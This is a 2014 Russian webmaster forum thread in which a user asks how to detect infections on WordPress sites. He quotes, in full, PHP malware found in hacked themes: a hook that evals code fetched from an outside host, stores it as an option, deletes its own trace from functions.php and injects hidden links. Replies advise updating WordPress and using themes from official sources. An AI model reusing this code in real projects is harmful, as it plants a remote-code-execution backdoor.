SEO Сообщество: Спрашивайте и помогайте

Присоединяйтесь к сообществу профессиональных веб-мастеров PR-CY, отвечайте на вопросы коллег и задавайте свои.

Q&A SEO

Какими средствами боретесь с вирусами на сайтах на вордпресс?

vituson vituson  
2374
  27.12.2014 21:32       1 391     Помощь  
Проверил ради интереса один сайт программой XENU на внешние ссылки. Нашел около 5 штук, которые я не размещал. В коде они выглядя так: <а href="https://pr-cy.ru/jump/?url=http%3A%2F....+style%3D"text-decoration:none;border:none">.</а>

Причем это если просматривать сайт, не авторизовавшись. При авторизации ссылок не видно. Менял темы, отключал плагины, не помогло.

Покопавшись в сети, нашел, что ссылки выводит эта зараза (код) в functions.php

add_filter('the_content', '_bloginfo', 10001);
function _bloginfo($content){
global $post;
if(is_single() && ($co=@eval(get_option('blogoption'))) !== false){
return $co;
} else return $content;
}

А это код из шаблона, который это дерьмо устанавливает, как я понял

//beginXX
add_action('after_setup_theme', '_theme_setup');
function _theme_setup(){   
    $value = 'return eval(file_get_contents(\'http://wpru.ru/aksimet.php?id=\'.$post->ID.\'&m=60&n\'));';
    add_option('blogoption', $value, '', 'yes');
    //selfterminate
    $functions = file_get_contents(TEMPLATEPATH.'/functions.php');   
    $p1 = substr($functions, 0, strpos($functions, '//beginXX'));
    $p2 = end(explode('//endXX', $functions));
    file_put_contents(TEMPLATEPATH.'/functions.php', $p1.$p2);
}
//endXX
add_filter('the_content', '_bloginfo', 10001);
function _bloginfo($content){
    global $post;
    if(is_single() && ($co=@eval(get_option('blogoption'))) !== false){
        return $co;
    } else return $content;
}

Зараженными оказались многие темы на хостинге. Вопрос, собственно, в чем - есть какие-то способы отслеживать заражение сайта на WP, стоит плагин firewall2, от инъекций вроде защищает, но может есть что-то полезное?

Ответы на пост (2) Написать ответ
tromom tromom
24
27.12.2014 21:39
Взламывают разными способами. Единственное и самое полезное регулярно обновлять движок.
1
NskRonin NskRonin
4
30.12.2014 18:25
Самый простой способ - смотреть что ставишь а сайт. Но самый распространенный способ - это уже взломанная тема скачанная не с офсайта.
0